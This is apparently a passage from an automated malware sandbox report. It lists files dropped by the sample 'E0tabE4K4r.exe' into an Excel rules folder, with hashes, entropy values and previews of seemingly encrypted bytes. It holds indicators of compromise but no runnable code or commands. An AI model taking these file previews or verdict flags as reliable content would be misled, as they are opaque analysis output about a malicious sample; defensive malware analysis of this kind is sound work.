                                                                                                                                                  Entropy (8bit):7.781499241382428
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:IW2cfM9zD7JEnOIvbXydGc9QOSUBr5qkmSx9zXhiYZ2bD:NBfK6XydGQQOSW5+40YyD
                                                                                                                                                  MD5:A590FC589E8E8195517A9FD3DFADD224
                                                                                                                                                  SHA1:71627D4CA9D0CD30CDEEF6F2D18ACFB2B6AD0ACD
                                                                                                                                                  SHA-256:FBA8AA8ECF75683BE3F4280191F4E3EF74838A36E3005CEF582CC7E85DB3FFD1
                                                                                                                                                  SHA-512:03814D7B76149F762B7391D9903084CE2C2F833ECBB5AAE178532A906ABF0A36B680DC56C65AEDC4A35977C5B58F89D4BAE3C89ED361A99F94D1098429A1F193
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlu..Y!.{Zx..V."*/+9..J.^h.~......Mi..W.-t0_...>].i...'... .....B..y`.._.D{G.S.t.#.)...g..,.l....8b.=....7.....r.K.>%as..1..P@Y.4-.M..>.b..@.....b..s/z.|....Lk.ru....u..4..gp8..s...>-FeL......"..Uy*5....q.3F..B..f...[...........k...i..Nr8DF...45..j...`.1.. .V.?lT....k..V ..b.|).!...1(.{..M.0S.Z..MSEv..q......'.Z......N.....I.x..[cl.s.\..\lg..... .3.3..L..SK.......J....tz1(...k....c.....~EF=...N.".S..1._b/..K.Wf.....]?B.MA...}.rT..8 #.....].`S=>......0./#...?..}.a.l..V.6y%BY.N....L[.o...X..A.._D..R.9.....8...%..!.....q],y...7...sH.e._..P....5BT.<..9..R...l7...Q5...#......'.;R.M.*.b.R'B.../.g.j.D..8....:...."....r..T..p2.Q.0....q.......JN..?..}t....G.t.:./..q.....'.z.%..3;=._.0.....8Y....Tk.%.O|.q./.U: .'./].....K.'.w..........a..!...2a.A.1tkmP..(.q.p.-.......@$.O.J).X...K.S...#%.....t!?.'D|.....M..SS..Eo.u...g..'..:f~.j..t....p-...o..8..EO1.D.t".f.c..3H.J....}.1.g9.;y,<Zyd.[....u.9.d.....g.E.M.1..\.p.%.R...%E.GE.?..NmMsRxMUuXypapZbGO

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510063v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):801
                                                                                                                                                  Entropy (8bit):7.72071943725526
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:L7MK6IS9MHmzX0KlVTwJFWTNV8qx+UkTV2bD:PGpaolxwCpVT+Uk6D
                                                                                                                                                  MD5:D576D1D40F83FEB8BDD5E8CDB0355762
                                                                                                                                                  SHA1:8662C13315B85D92C5C6A2068669F5714059A00B
                                                                                                                                                  SHA-256:2BABAFEC982E0AE65B99471F9384E21D838BAB8E51E6360C52A15E3A4699717E
                                                                                                                                                  SHA-512:0483558DCB5D12D2368115BA444198238588967641FCE5D3F1C33A56317C9927D6752FBD74EAC749D0FD7B416BF2580DEA13B04BFB38BA08E290591FB807A9F9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.u.V.(.....t....*.r..~.vrS.N.2]....<......{?.....>~......Z..(.sid..O5....!..%2gj.?..8.q'.4...i.G..L......:...Hq...]..u.P"......'.(.yx`"...1i.!..PO...0.MG.%.O..jf....u|..t7..>".nF...$s<?j.P.Y_.FL.J.8.5w]..hv...D.......D@T+D..&p.gqD...0b.Qxr..kz..9.K...I...9..!r......l...sl.w.pKTB....2.E.o"...0[Y...U.5.k..F..s..F..2...)Y..<..~...&....|.E....>..].F>.#\]......L.ds...mt..x.~<.....A..q.|.E......A..j.d$..K.)...n.7..WH#.-=:8.8....h.....mP.D..<.<..z..Ef.....y..S...:...sl8...aEz9zT..i....U.].on....zQ.D...#..s.........2.j..f.n]....R....=.../.+l....-.v.Cg..U.S...0.....".<....oQ...{)?.(o.8...W"MkESQ..5M../a...>....T0..3{.X....Q.....n...,(..,0.p..p.c2cSN.T.x..'..&.pM,.E.E..Q ..W.#.bmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63028v4.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1485
                                                                                                                                                  Entropy (8bit):7.883452823789054
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Jju6MF1ACApl65ZTGeKUl6nRZxbVANkR3isdODcoV8WQrsv4BR8J7ML71iLjW+cI:ctVGta6nRZxbVANe3iDDcoV8WQv8J7M0
                                                                                                                                                  MD5:865C350E0BF02A63472975A0DE783537
                                                                                                                                                  SHA1:985B6FACFAAEDE2DB719BE927894F7172C791E2A
                                                                                                                                                  SHA-256:9588F37A96BE4493BDF1AEC82C4A737D81D4B1CCBB0016F4FB83AB3FFB57CAC4
                                                                                                                                                  SHA-512:0861CAD41D304DB02B3CCC5EA6FAD94EC4596F4506833AF88623983EDD1B9CE9ADB420A26B73CE32147F69B088B5818FE9F7B30F0FFEEB662E2AD9237C7F5204
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.w......o.u......X...-....i)....~.B.)j..n.e.s..4.K...?8...U.W...$2.......R.O...T..F 3..wF..jAK..(.k...^.-0B$.M..<..,6....uTM.#=$....?6.P.cp2.MQ..K.....`..o.k..9...[R...Q;.(.".)..1......8..O...|......#.B...~....KKT.`.}&y../.>=.].:.V...].{)F.?....ne.(....~.....5i748ukK..U..K.../.a.?t....$].....>.r..'..nR.h.;....#6@_8>...'....%.O.=eM..d.*.N.....c.G.b....R..c.N..h..J....vF/..z......^_G...u...W....k}".E..c.........4f....]lq..18..FR....;.......|/...i_..s.aJ.~N.y.......T.l.......K....\F.....7Yo........Q...........U.j.=....t\m [..&...:.5.K....!.r:...V\cAK..}..3!._...wQ..t.#...y..?!.9..#.*..g.. .Z.V..w#...-.v.:..z.Sc.J@....aW'....I.D....m%.K.+.P..<...).{...+.hi.-].X..e.............:g...C...M.@Q..j....Q.......,n.k...3..V...7C..;m..4.=.....d".x..j)..q...n.H...x7S.... }.0}S.........8.i..6h.$E.W.......o.G..^.jfd.h.gR.i.J..lyN.w..2.....Y..*.2.'6...P...0x..PwT..5.8T.G.,...'uH=.r.1..D...p..,...R......../.Ay.I.....%..6....a..b.q....E_...^..uU...k.8O.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63030v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1340
                                                                                                                                                  Entropy (8bit):7.870196638676693
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:pX9XecDcyHD1tMiDZrIlc4Xla2ebg5BLF8a9kztIZ6tlWASs0rW2bD:ptXpIyj1vhvNg51VAlnWnsEdD
                                                                                                                                                  MD5:FEDCEA491EAA4171563070EDA4BEFDA9
                                                                                                                                                  SHA1:EB61BF4D69F79D900ACA2F089DA394FE7D567C2A
                                                                                                                                                  SHA-256:B75EB2A6F0707AECED2AC66B0BC6F5EA8CFA8E0ADA1314EF0B67AC7B568D27E1
                                                                                                                                                  SHA-512:6813A8F9563E6E881AB0A0511213F374F2C29EF4FBCA051E6641990BDECBD9782F7B1B3F574FA9F85A3BF98FB5B234C4A74D46BC1C40627A4E65015560E6B026
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...%N..v.Y.a...(}..F.M6...X.. .Q..NR.*.>.hjq..C...[6.I.....6.Ea...7..f=.D.i.l..pf.!.g*....[S.......b.m..+q\.X./..1...."..,,...)...]..3.}h..S.;J.{"..Z..e..1..vP..6..d...#.]...".m..m.l(.[..xP.C...&cT[....j.$hQ.a./..A..0.MX..PR..T.taT....*....Cd..Uk.ON.. . ..c....K.5`:..........x.......*a.....1...].:%}L..r..x....?..9...F....8...#.[.G.7.xi..;]jo...... ...V.H......p.Uv.a.~.F...W*....N_n....T...|.@..V...<.B........N.A\z..U.....+.yB.7.h2..3.a.XZ#..I.2.cr.......w...9..*82.JE..z{U....@.R.+..iY.x...5Mk.......'z"${.3..5q.\B.#.}.{Cy4..pt.z.3o.i..&.g{K6H.:.U....9.J.m$.2....5..X`$r..]..".~N.f......|.......a[..W....n,.F>g.......T&...nM*L.v.........Kt...w..`M........P.us&G..v.....oq...8.UiT`..>.xikl.V..........c..}.:~,.X.....w.r...C.C.L#..o....N..6o.sO<#G@.gO..#.#@...zv{.s+"....y..cr..6..-..!.FrQ.Z.....p+.......(..?.(..z.1N#.ap...3._/............t.j.$h.i.a..kg|.N.e.d%...oS..N....3w......+C.....FB.++....7......ZK.`.)..,.^.D.A.;.....)hux.3....u....k

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63038v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1261
                                                                                                                                                  Entropy (8bit):7.817821959759007
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:+KgoS+Us2uF48PDcEDUnfMbnayezKG/lDuBOk3hL2GLX8wrIRLAIC++2bD:zgoSbpub2nfKQBlCBdR6GLXN8tDC+lD
                                                                                                                                                  MD5:0A14ADF0ADC5A9E7E5D5614533944869
                                                                                                                                                  SHA1:9BC782D55AA1AA908B870477E1F313C9090FDB2C
                                                                                                                                                  SHA-256:5769B358A532D6E9ABCE9440790D26C4BC3F3B082210B18F18ABE72C9880C92B
                                                                                                                                                  SHA-512:9D79A022004469B58D1A917D61A0FF16F61D931C2AEDD35EE1AC3783378B2E173AD541DBD5DCF179ECB01CBDB97AAEEF12D6595C3789C627C69B5249F22FBAE6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..........2....u..=p.MM.B.K...G.,.....q......#D.e....3.7.7...Z.33...5ZEo.K.}.-...K.RgG.Zcd,..1{_ .1..[..o...}m.....).*.=.....-|...t.>.%..".sd#....S[.....n.Iy.JE.x+.~..X7..?...|.Y.=.....yUzE../.zd`.L.%Wt..Xn...g.-...`ek[.D...i..c..!z,...=.%.".Z...5.....U.#H......}..9J`=.f.Q..;.Z0......SW.OD...l.D7^.b...`E*....."...pv.xe....{.J...y4s..j.....(.T.Q..~c.n>1s.....M.q.M.o/\...$*..%...8.-.....[..3Oo.v}.....4.!.)... Uo..EA........9.+...Q.._.,NS..`h.'\..y]Tq ....F>...0n.7..W..9f.*.> ..W.._.%..W\..{@4....4..!.2....c7.o@w.....}..;4......m:?Z.\...s...M..7....z..."s..`.(.F......8....L>......E...l...c,X..5}..j.`8...q...\....*.g.x\.V$...]|R.5...."..S.......~\.Z.;&).E^...>.....\..l..F5..L....`h..L~...i.....p-N....&a.=..U-..*;.._z.....f.8@M.&..d.f5.2[.QbD.B<R...@x..:./4z.N1....z.v..^..9.T.i..>4..|'..{...;.........^U.. ._7.H.........I}.<@g............Z....mQ.(....S~...Q4.....}..D.I...9...9....Fbm...].,...!.=..j...j.H.....p-.r....+p...N.....zh.z.%..A.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63040v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1268
                                                                                                                                                  Entropy (8bit):7.810378685974181
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:UzohOkYAcR2PBnCUB1hoVLzf7oab4VNWTLOmAv/1pbibZZoV2bD:Uw+2PBJozDkVgTQQD
                                                                                                                                                  MD5:60BF2CB52B15F8132720C540F5F80ECD
                                                                                                                                                  SHA1:FCAFDFA782E05B1BE56D91AF63F859D4887C215B
                                                                                                                                                  SHA-256:0F766B27B943ED20921EDC9790BC64B6D6301C62C28043868A4E5251B73598C2
                                                                                                                                                  SHA-512:C0684D1F73EE513217E0FA4818F887AAF650444FB9F400D57BA9FDDF9BEF7FF4F4B3659DCD99937663F620F51C13C20A040D4521D3051682116EF60AF3E7DC4B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...q.5_..e.I;V...F.y.\.)..Q...._e..k..v.p.S..}............9......I......v ...hf.<.l.@...Vbip.R..........!k.l.......&....?(....NO..64.<......{............D...HJ..M........r.i.0^../...."..xG........K\f.p....8`u..]..J........t....94..9-.'..0.Y.V.(6.k...g..R7p.!.....yK@(/tU..J;..Q1&37<......Dko.-L.9.+..6.....M.Z....O.t4..#.'2..:.(dO._J.f7~...........' +{..3.E.6p.".u{....9L._.D...b.......d.Kf>..=K.....J..U..1..{.....O9.s:-.G}.....}A.=H.E....b...........e......./v.pZ..W.........JU@...c....uI......%..S,..cO.$..=lBY.............H&...(#....e.._...E..s..-}...Y.......o.1w.;..p....z.oU..._......43.J<.d%5C7...^.2..&.....Y..!"..Yl...-.{...rA.$.......k.B1!+.q.f{.g...D..g4 0......#I@<}.(....!..zg.S.....W..~_.v.s......6.....|K.l..FS..n........m3;.!.X..l.,.......b.O..K.U.-p....+a......_.6.m4t..F0.dV8....Z.T."..^.E7.K.1^..;..4...o..m.p./SY..yJ|....?.h!..>6.P.O.p.......:'E..!..6TU..jF..o..A..o0..g.!...j..[..d..~.L.N[...0.w.L....6..`l.x*...d.G.E.Z...)v..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63041v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1815
                                                                                                                                                  Entropy (8bit):7.915117394668207
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:HCrdyv1IHj2NdFm9z0LyLGoPmPQxyPQukWKEyZuD:iZWIKBSIGLBPmPMNcKZW
                                                                                                                                                  MD5:C676A2C319887D40A92EBBBA23012DA4
                                                                                                                                                  SHA1:B980CB43D2CA18F039CC51C661DBE5F6FF9AB981
                                                                                                                                                  SHA-256:EFDD329376E5D98F9825402C151195B2A8B1D6C893A3FB1DF04616A42BCCB60D
                                                                                                                                                  SHA-512:BB947EAB95E6250339177404FBB720092C421026E3E5E86E199D0FF1575CE095FDF1B3B388AF0699AC0D921385E896CFD7A05C3A8D7AA31468EA85F1B4C4F7EE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlw5...N.5OqV.o...R..]a+.#.L67.j...-...k.J;$)R..u}..E.....o..[....X.D.$>+V....u...*>..,o.V..?.....tK...V.i...Ku.q.ah;..t......p..U.`n..%x..^.2f/f<.q...8K.d.m..B..3....%....T../..4Wj.A...df..N}..ba.4...A..I!..j~c.....|.p.&.6...%>5M1.F...6....6. W.Q.hp..V..t'=.4......."8...b/..&..rW.o...N.....WN.I.|...x..(MM..<X#HJp..H..V\.......=|.':g..k............k@.....-....%..a..............3......../.....v...C....u.0t.....E......C..Z..^_.._H?...L....;+2L.Pq;.C.....`4.k..U............q.B.>!...p..$.....c..F.c..Y.WVfs.FN.b....;....([.yl|.y....jg..J^....HY.r..<...i...!.\..-...F.Y.b&........FrL..#.4...(.&t..`y.H...l. ......[.Y];c...CX....r.{.\ce....#...F....vK?.....]...+...k.@..moDK.1b(.~hIL......tcLoD.....u......Ba...........:*X!...b&.x..+.*.B8..W...H..........M.kc.:.mY.9..qU..r...J.a.q...i...H.g!Ba.....<.r.v.lm..Z.#l...m.......-.....=w....Y .........+|&...n...Y..!.Y.}....S Iv.iz7...r`..6*..oGG]......m..u..\_;\.l.....$.?l.T.....gKsD........<3./...S......

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63042v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1004
                                                                                                                                                  Entropy (8bit):7.7721704826715134
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Zz6WPY+wf/WCjeMS42BZaaJtn/dM1h92bD:56Ww+wf/WQ4ndtuXWD
                                                                                                                                                  MD5:D0D8E2565EB3C66F2D2F2620A4653288
                                                                                                                                                  SHA1:A472B8FE2A98DE3CD0B9C63BB6BF26A800B32835
                                                                                                                                                  SHA-256:E92217ECD2DF36ED89B2C29282B78E1B464A3FDE7501ABA2D0D49D66D37750DC
                                                                                                                                                  SHA-512:0849709D2AD19D9BEF07699C72FAE7BB9D7C17CBB8F73DE15C5704A89E17F6247140DB87AA95F7A54A81D64BAE1DC8879A486EC9CA740F06EA103A2917BB7312
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml._...7....+..U.&#...S...B.Z<M..D..2q.6..b.i.^3..O..p...|....I...2I....5.s..b...\(9k.Q.@......I......l'...Z...@.mO..xW.V..#..B/F,.7&.W..9D.G.~.@..Q...O..^z.+.^D.&.J...P.~...5..6T.^..T......iP+E=.W..'.E...... ..?.,p....s.Z..S......@@..J...f..........DI.'....A..j.12s./..z.U...4.zwjL_H.....A.RC|...| .6p...,.?..dW............,l.&.F.H.U.H9.v=.R....s.Qg/....f~.eHbo.qq.3.U^r.)Q...kVG.d..M.l;.+.=.(..C.....'.....,.2.$......S....%,..+.J...a..<E}.$..\L.x.G.....7j.f+%l..t..b.$...H..~...uH...4.%..L.....Jg.+;T2../.$6X...t..6\T.<<.....2..\.E..x.n....3g...z.....=..X...&.A.@De...(...\f.:..E.2...?.F!.`....p........+.r.7....S_+..... +nj.8I ..LRza....3:8eH...,...."z.~.......8..i.*..G.S..-$".*......a/..l.9^...*...[.b.'..T...`*u>..!.}..]..bD...k.a...-<.uY.2.d....h.Cl..3.......;.. .5g*..:...u.....{`.Dc....`....<x4..I_.f*3..f.h.t..b..PN..G.G-.Y/.....^.T.y ...X5K$.....z.w......R^mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63046v10.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1950
                                                                                                                                                  Entropy (8bit):7.898998296522413
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:CA3lN6fD82lTx17Vx/mT7C2sKgKynKJRDgojOG8bQQpmdmwVeD:jlkfD9T37VRUC2sKynKJpRO7bSU
                                                                                                                                                  MD5:2C7CF1144DAE605744A2732C9C873867
                                                                                                                                                  SHA1:F02A80FEE17913F8765D23B1CA82A59E934899CE
                                                                                                                                                  SHA-256:25553D5A51FFE84433DE68C2AE68EABE099AFDD25D6713A96F587B2E5DA18E6B
                                                                                                                                                  SHA-512:26DFD4A29E0564FDEBE384B1583737D487F7651C1D22B6300F4760F47FA8FEADA545FA17912E27BABC0F2848C38A106662BD0B54C81BCBF51CE3BB3BD6B62AFA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.U.S....q...z ...;9D.#.(U.kK.._-.\:.g......3....a834....IF.{.."@U.aE.....W<....H.!.~:}.W....G..*L.U...O..uJ_....V.I..Qo.2N......t...g.........d=|.......`..8.....|.,.L~U..\..y.yu.N..4E\....N....qi.2=..>.r..M.,...M..........g....S~...}.........+..=M...[.~.h.....g.7....w.r.<..r.i(0. .".9...._.....Z.t.k...?....Zu.d.....4.@.'..P.QI.8....i..:.#Y.[..a..$>.Y..L..G0.wd?.X$|........&!..../.zU.T..j..9.|...28.n...hy......./.....t?....[...R..G.Z#.DE.v...I......M..!..MDW.,...>....}A..Ec.y.T..y...|.9.b.{^.....+3$.7(...2...;.m..L.......|.....#....X.......s....t.....0zQ.S.S.x.....Q~.V.FYN.1....<..Aal"...A.,...7.E.Gs.Q.......V.....G.DLyd......SG%...^.3.....|C..M...e.}..C......)."_..{...c...T.... .....y.idR....k........w.G.#,.... e.V.Q...8..n*.._._......3..Y)]H.Q.~...U...s...Eg|...Sd......x....?U..#.U...v?....U...t....,......$.<..F...U..^...bJ.^^.=Z~.....H0f..>...23...D2?....X......R..9#......>.X.#....(.A..g..1..c.*..x.H.2..@....>_U......

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63048v6.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4121
                                                                                                                                                  Entropy (8bit):7.955035488487218
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:5e84HyW4rjgfczLXaWLvDZjEQiMJM87SJmdiH1iyC0tWF7Vj:5e84SW4rjgEasEHJmNItWFJ
                                                                                                                                                  MD5:9068523FC85AF579A49F7EF7E8A7048E
                                                                                                                                                  SHA1:6F9D23904363A12C871AE8A991CADB8D825888FB
                                                                                                                                                  SHA-256:EBFE58B96249861BA7F48DB2DF0A46A7610C072803AD59483DE6AD53834767E6
                                                                                                                                                  SHA-512:BB9DB137AE66365EA860A56D15C638DDA5C0809A52C944E899B70E59B85CC26D317F8111EE3ED6DC5B9D9E4EEEF408D9BE73EE0966F6514B2789E610C995B90C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml_.O.`........0..}.hJ.D\...AYx..-.[.c...{O.."d..W.k.!=.../..WcI#..p...F...L`......J5=.g.....lO".c.....*.1.NA...6..4Y].>.noe....[?...Gz..L..}.....9.....f.......A>...+6...Hu.....e1..`a..y..%j.C.`!b*....N8."!.U.4G.Q..".K.......8r.}...p.|).:..M..m/O.Oj..xO.@.s......Y>'..v..7h....+U$..J..[....-.`+.............r...5k`.V.+...Z.jS$~..Fr......X..C...:/?X*..IW........<..o.....@Y..d.{.....d..~I........%.qJ<6._...0.........*Q...~.....0..:m.G!.-.,.Ii......&..>U.m...`.*Y....j..4......t. iwt.z(B...:..J3...K.....M~ziS%..t.[`.4.ds-......[0Mi+..0 ..6F.....CLS.N..;.k.k`E../.-e..n+(.S...]...@.#.."a.*7.*.(.....ST56..j..._...rX..F.m.),!..X..N'.b.j....i.o.C.....P...|..Da<.I....v.....(....}s4...s.t.R0.V9.MIx...*C.k....'M.f. p...D. ..K.N.......4...p5-sh.....D.#..ay.l..I..]..Qt.H.6.....wF....?....L|...._?.PG..*p....VU.aG.......}.a.....T)g.M[K..M.H.|...s.p...)..../.......:{.s...._..Q.Z....1.^|....O6.(L..3U.'.- ...QXQ.wC..ae.0...;.VPvnnn..n..G..[..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63049v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1585
                                                                                                                                                  Entropy (8bit):7.87855734395825
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:CrA0w2UY8N5Tm/DLeVpX7ksXw1e6slAWOMKstpk9Wy9MRqhvixQ5v1sM2bD:CA0w2UGHeVVYsA1IKWOJsTdgMRS6fD
                                                                                                                                                  MD5:6B654DB37B57398612CA76876E7C0843
                                                                                                                                                  SHA1:86C3D295A41EC06DF50E1DAD6DBD89C9B3511977
                                                                                                                                                  SHA-256:4B2F7ABA8249DB46BE56DB62E686FD9B172C721896EB2A2423CDE062909ABFCC
                                                                                                                                                  SHA-512:D4D16666BA45D54839B47C59D873ADB1F4ACF5C2F05FFCDC675137FA3B8B21560EBE24A71353548749850B86C009219B4D1632E5F2621A5C9414C0EFDB9B2297
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml7'..(...$ZB.B{.....x.......r.V.v........... j.Y.r_.C...E6.)'....9.4.............aQ.m..|l.H...x......w...^...."............../.H....j...gL....6o.M.....f....=....P...m).5.l......sD.Z......l.:.#4..QR......&.:...6.^O`_Z.l.3O...\,8.^1..E..l]...[.1.N....l6=......Iab.2U../.!...3/..R..t.R..~...`.....y......o+.R.be..W..!..\..........4..CA.$Y.C.,n.y7....L.r.p..Z..B].O"...p.I..xd....%.....?9^*.5g...b..2y2.u...m..$=..L,...Y!...=.:.......A5@.t...E..R.\..x.5..Y..._Tx.\o.s.RX_..@..QD..)...."..j...t..V./."..iY.K....v1.a .1.T...T.^0.... ...2G..T!....p."....G.-....,........-4..z.cu..u.....v=....6TU...T......o.@q.....#?..h.`...j.&...E.gM+.RN..8., }...Z.2.F.z.^z.e.._l.iR....1...v...@.!...<...j.aj;=....`..{,v.G.....#....v.....4.....s.=....r.x.........2..3h.11..8.z8.d.5.>.*.#I.#.Fw5....Kd....<...}.C..f.I3..{C.N."<a]...Y....8i.....V.nG.. .k..?O..Y..f6.q.P..$....w....2.).9C.....8G. .N...g. .x)...C*:j.....I.W.....UEX.h.......{...t..F.P&...C..M..Eu\...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63051v5.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1939
                                                                                                                                                  Entropy (8bit):7.892922691164522
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:rKaF1MKfmKrWGWRGM4jb4eU4FiV+vR1Ob3gVz10AqKcD:WxKf1ARXV4fJ1OUVzOAqf
                                                                                                                                                  MD5:254897A06D3750067FA384B44AA2EBFE
                                                                                                                                                  SHA1:11F82DB6FA572BEA59FE3EAAB084938B0523CF2A
                                                                                                                                                  SHA-256:C2907E9806FC0662AAA980B04BB00475F6894F78791D80AE9ABD00F150718340
                                                                                                                                                  SHA-512:D57997F555FA1E4755F150EABBE4207C9B774332936C6F144A782D3A3B4A29BCB786EAED8709CCD5FCD09AE8A31C1044F45E92C91F559996A79C8FF716A40BCE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...N....d.b...G0.....+7..ola6.......'...+..|3..F..XD.. ...QK....o...B.OP....+0....gB..NW..S.p...~X.jzL}....x..|..a"....51..k...G.I|.pG...t}hqG..k.r.q.w...dc....B.A!.p.;..W(..%.4m..f....c`..P....N.8...I...RT.B.k....9.......G4..v...'...W.qrB19r.E^q..D..,t..g.NJ-.W.;.o.8YTd..".E.z."..|o.Hx......y)t.7.83.....U..].#.c....zT|....C;`6|(..y.......I../..;...8......w.G&.....f.]$..zH..} .X|J..E[.....QN+m....j{u..u:..6[...J.../%v`..Q[....;......4..n2...~.K..q|.F..w.Y..+cS:.r.A.:.O{..s.>.~.w..0.P..kzX..$*Q...U@..j$.. .......q.s....q. ......v..K.....9.....%Q...@.d`J.q.}.. 8...{.d..|..........o.|..v.......P..P.Fs[.*&.v0M..v..i.G.s..s.*B._......>..]:....V..N..t...[_.i....d...c=..R.C.W..U7.....a.......-.....2...'{...K&.e.....h..>F.S.sy.N.\.J>`...o..#.Ji......Yp...do2M...`..L.A._c{Q..F{D1.s... ...w...t...t.p..d...b...G..Ar.W:.q......O..v&...:........=!/"....._....Z.d'.z_LT..-.%.?/Q2.. .._.%......M}.8......../yX.}.E..U6l....3.R.e..g#._ ..gn.8.;

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63052v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3091
                                                                                                                                                  Entropy (8bit):7.9263573826434355
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:Ky5ryYUmq7ribVKISgXdtjVFDPlqCvtDN:75ryTrmsISsjfsCvtJ
                                                                                                                                                  MD5:FE16E72445ACFCC2A94791BEF79B70F2
                                                                                                                                                  SHA1:8D5899AE2F5CFDAED98E358DC960B5FE9C22C7AD
                                                                                                                                                  SHA-256:D11EEB5E7041A58D86BE7F6251A5D42B48A6C280D51858C83A0909C1DFFDC069
                                                                                                                                                  SHA-512:9325BF474A678BE948FF7EE0B1771ECE7A33AF7EECCC46AD8EAD6A6B0707C097D92F936FF676106DB8560B8D050D80234E2190397FC1BD8003D8A4FD91301060
                                                                                                                                                  Malicious:false
